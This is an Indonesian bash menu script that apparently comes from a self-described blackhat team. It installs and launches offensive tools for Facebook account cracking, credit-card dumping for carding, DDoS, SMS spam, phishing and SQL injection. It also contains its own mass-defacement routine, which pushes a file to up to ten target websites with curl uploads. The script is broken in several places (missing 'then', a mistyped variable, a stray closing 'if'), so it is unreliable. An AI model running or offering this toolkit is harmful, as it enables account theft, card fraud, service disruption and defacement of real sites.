blue='\033[34;1m'
green='\033[32;1m'
purple='\033[35;1m'
cyan='\033[36;1m'
red='\033[31;1m'
white='\033[37;1m'
yellow='\033[33;1m'

cowsay -f eyes "D35TR0Y SQUAD" | lolcat
toilet -f standard "MR_XiD" -F gay
date | lolcat

echo "\033[33;1m===================================================>"
echo "\033[33;1mCoded by : MR_XiD "
echo "\033[36;1mKontak  : 083851312460"
echo "\033[32;1mProfil  : lahir 18 juni 2003, now 15Th"
echo "\033[34;1mBlogs  : safri4687.blogspot.com"
echo "\033[33;1m===================================================>"
echo ""
echo "\033[31;1mDAFTAR TOOLS"
echo ""
echo "\033[32;1mselamat mencoba gaes semoga bermanfaat😊."
echo ""
echo "[😊]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>"
echo $blue"[ 1 ] Red Hawk buat scan website"
echo $red"[😊]------------------------------------------->"
echo $yellow"[ 2 ] Hack facebook methode MBF"
echo $purple"[😊]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>"
echo $cyan"[ 3 ] Dump cc buat Carding"
echo $green"[😊]------------------------------------------->"
echo $red"[ 4 ] Hammer ddos"
echo $blue"[😊]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>"
echo $purple"[ 5 ] spam Sms Lite"
echo $yellow"[😊]------------------------------------------->"
echo $cyan"[ 6 ] Tembak kuota XL/Telkomsel"
echo $green"[😊]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>"
echo $yellow"[ 7 ] Admin panel page finder"
echo $purple"[😊]------------------------------------------->"
echo $green"[ 8 ] Deface brute webdav"
echo $white"[😊]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>"
echo $blue"[ 9 ] SQLMAP"
echo $cyan"[😊]------------------------------------------->"
echo $red"[ 10 ] santet online [khusus mantan kamu]!"
echo $blue"[😊]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>"
echo $white"[11] membuat Scrip (Deface) 
echo $red"[😊]------------------------------------------->"
echo $blue"[12] Phising Game
echo $yellow"[😊]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>"
echo $red"[13] install kodork
echo $blue"[😊]-------------------------------------------->"
read -p"MR_XiD---> " bos;

if [ $bos = 1 ] || [ $bos = 1 ]
then
apt install git
git clone https://github.com/Tuhinshubhra/RED_HAWK
cd RED_HAWK
chmod +x rhawk.php
apt install php
ls
php rhawk.php
fi

if [ $bos = 2 ] || [ $bos = 2 ]
then
apt install python2
apt install git
pip2 install mechanize
git clone https://github.com/hnov7/MBF
cd MBF
python2 mbf.py
fi

if [ $bos = 3 ] || [ $bos = 3 ]
then
clear
cd module
php key.php
fi

if [ $bos = 4 ] || [ $bos = 4 ]
then
pkg install python
pkg install git
git clone https://github.com/cyweb/hammer
cd hammer
python hammer.py
fi

if [ $bos = 5 ] || [ $bos = 5 ]
then
pkg install php
pkg install toilet
pkg install sh
pkg install git
git clone https://github.com/4L13199/LITESPAM
cd LITESPAM
sh LITESPAM.sh
fi

if [ $bos = 6 ] || [ $bos = 6 ]
then
pkg install python
pkg install git
git clone https://github.com/kumpul4semut/semut.git
cd semut
python dor.py
fi

if [ $bos = 7 ] || [ $bos = 7 ]
then
apt update && apt upgrade -y
apt install git
apt install python2
git clone  https://github.com/the-c0d3r/admin-finder.git
cd admin-finder
python2 admin-finder.py
fi

if [ $bos = 8 ] || [ $bos = 8 ]
then
clear

toilet -f standard -F gay "BruteWebdav"

echo "\033[32;1mName: MR_XiD"

echo "\033[33;1mKontak: 083851312460"

echo "\033[34;1mmoto: jangan banyak bacod"

echo "\033[36;1mTeam: D35TR0Y SQUAD | JATIM BLACKHAT"

echo "\033[31;1mMasukan nama script"

read -p "(~~~~+>" script

echo "\033[32;1m"

echo "Masukan Web Target Ke1"

read -p "[=======>" Ke1

curl -T /storage/emulated/0/$script $Ke1

echo "\033[32;1m" "Masukan Web Target Ke2 "

read -p "[=======>" Ke2

curl -T /storage/emulated/0/$script $Ke2

echo "\033[32;1m" "Masukan Web Target Ke3"

read -p "[=======>" Ke3

curl -T /storage/emulated/0/$script $Ke3

echo "\033[32;1m" "Masukan Web Target Ke4"

read -p "[=======>" Ke4

curl -T /storage/emulated/0/$script $Ke5

echo "\033[32;1m" "Masukan Web Target Ke5"

read -p "[=======>" Ke5

curl -T /storage/emulated/0/$script $Ke5

echo "\033[32;1m" "Masukan Web Target Ke6"

read -p "[=======>" Ke6

curl -T /storage/emulated/0/$script $Ke6

echo "\033[32;1m" "Masukan Web Target Ke7"

read -p "[=======>" Ke7

curl -T /storage/emulated/0/$script $Ke7

echo "\033[32;1m" "Masukan Web Target Ke8"

read -p "[=======>" Ke8

curl -T /storage/emulated/0/$script $Ke8

echo "\033[32;1m" "Masukan Web Target Ke9"

read -p "[=======>" Ke9

curl -T /storage/emulated/0/$script $Ke9

echo "\033[32;1m" "Masukan Web Target Ke10"

read -p "[=======>" Ke10

curl -T /storage/emulated/0/$script $Ke10

sleep 1

echo "[<=====================SEDANG PROSES=====================>]"

echo "Silahkan Cek Web $Ke1/$script"

echo "Silahkan Cek Web $Ke2/$script"

echo "Silahkan Cek Web $Ke3/$script"

echo "Silahkan Cek Web $Ke4/$script"

echo "Silahkan Cek Web $Ke5/$script"

echo "Silahkan Cek Web $Ke6/$script"

echo "Silahkan Cek Web $Ke7/$script"

echo "Silahkan Cek Web $Ke8/$script"

echo "Silahkan Cek Web $Ke9/$script"

echo "Silahkan Cek Web $Ke10/$script"

echo "[+~~~~~~~~~~~HAPPY DEFACE~~~~~~~~~~~+]"

fi

if [ $bos = 9 ] || [ $bos = 9 ]
then
apt update
apt install python
apt install python2
apt install git
git clone https://github.com/sqlmapproject/sqlmap
cd sqlmap
Python2 sqlmap.py
fi

if [ $bos = 10 ] || [ $bos = 10 ]
then
apt update && apt upgrade 
  apt install python2 
 git clone https://github.com/Gameye98/santet-online 
 cd santet-online 
 python2 santet.py
fi

if [ $bos =11 ] || [$bos =11 ]
then
apt update
apt upgrade 
apt install python2 
 apt install git 
 git clone https://github.com/4L13199/LITESCRIPT
 cd LITESCRIPT
 python2 LITESCRIPT.py
fi

if [ $bos =12 ] || [$bos =12 ]
apt update && apt upgrade
apt install python2
apt install apache2
apt install git php unzip
git clone https://github.com/Senitopeng/PhisingOnline.git
cd PhisingOnline
ls
unzip PhisingOnline.zip
python2 online.py
fi

if [ $bos = 13 ] || [ $bos = 13 ]
pkg update upgrade
 pkg install git python2
 git clone https://github.com/ciku370/ko-dork
 cd ko-dork
python2 dork.py
fi

if [ $bos = 88 ] || [ $bos = 88 ]
then
echo $white"teganya kamu ninggalin tools gua 😞?"
echo ""
echo $red"1)tinggalin aja"
echo $white"2)pengen pap"
echo ""
read -p"pengen keluar?? =>> " 🤕
fi

if [ $ok = 1 ] || [ $ok = 1 ]
then
echo $yellow"terima kasih kak sudah membaca 😊"
exit
fi

if [ $ok = 2 ] || [ $ok = 2 ]
then
echo $cyan"jangan lupa cek barang bawaanya dadah~"
exit
if
